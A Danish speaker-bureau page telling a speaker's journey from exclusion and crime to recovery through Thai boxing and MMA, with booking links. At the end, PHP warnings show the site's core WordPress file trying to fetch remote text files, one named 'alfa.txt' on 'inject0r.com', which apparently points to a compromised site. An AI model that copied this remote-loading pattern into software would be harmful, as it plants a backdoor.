img-us
Fra er liv på kanten til et liv med kant
Var jeg den sorte arabiske hingst der ikke kunne tæmmes? Spøger jeg mig selv, eller blev der bare ikke forsøgt nok?

Hvad betød det for mig, at jeg frit løb, fordi man ikke turde sætte sig op på; mig, var man bange for at blive smidt af?

Hvilken følelse gav det mig, ikke at blive set og hørt i som jeg gerne ville? Var jeg den vilde som de andre ikke ville med, fordi jeg var anderledes har jeg spurgt mig selv!

Det var oplevelsen for mig, gennem tilværelsen i folkeskolen. En skolegang, som var præget af at jeg følte mig ekskluderet. Ekskluderet fordi, jeg oplevede mine lære ikke så mig som den jeg var.

Var det fordi de ikke var rustet til drenge som mig?

Var nemmere at stille mig i båsen, og lad mig stå alene der. Så jeg ikke sparkede og prustede blandt de andre, der var tamme. Det tror jeg det var, jeg blev ikke inviteret ind i den sociale arena, fordi man var bange for at jeg ville sparke rammerne i stykker.

Jeg manglede at de gav mig seletøjet på, og ville guide mig, så jeg kunne lære at navigere i terrænet. Men dette krævede jo at de turde at holde fast i mig, og komme tæt på for at give mig det på.

Jeg troede på to ting - Himlen og Helvede.

- Jeg blev anholdt.
- Jeg var tæt på at ødelægge min egen familie med min livsstil.
- Og kun dumme mennesker begår samme fejl to gange.
- Aldrig igen.
- Jeg kom ud af kriminaliteten.
- Begyndte at dyrke thai-boksning og jeg var rigtig god til det.
- Jeg kom af med min uro.
- Holdte op med at ryge.
- Fandt min balance.
- I stedet for blå blink når jeg klappede nogen klappede folk af mig.
- Gav mig penge.
- Sendte mig ud i verden for at kæmpe.

JEG TOG ET VALG OM AT FINDE MIG SELV!

Dette var for mig første skridt mod selv udvikling.

Dette er historien om en lang vej fra Palæstina til Danmark, fra modløs til mod, fra lys til mørke til lys igen, fra barn til voksen til menneske. En vej ind i kriminalitet og en åbning til livet og lyset via Thai boksning MMA og en familie, en lyst til at give tilbage, at have overskud til uddannelse og til andre, der også skal finde et lys og en vej tilbage til livet.

Det er en historie helt ind i kernen af, hvad motivation er, når den er sværest at fange, men uendelig i værdi, når den rammer hjertet og hjernen og verden, når du møder den igen. Som et helt menneske.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Book nu

Andre foredragsholdere

Thomas Dybro

Nick Barnø

Rhassan Muhareb

Bjørn Christensen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22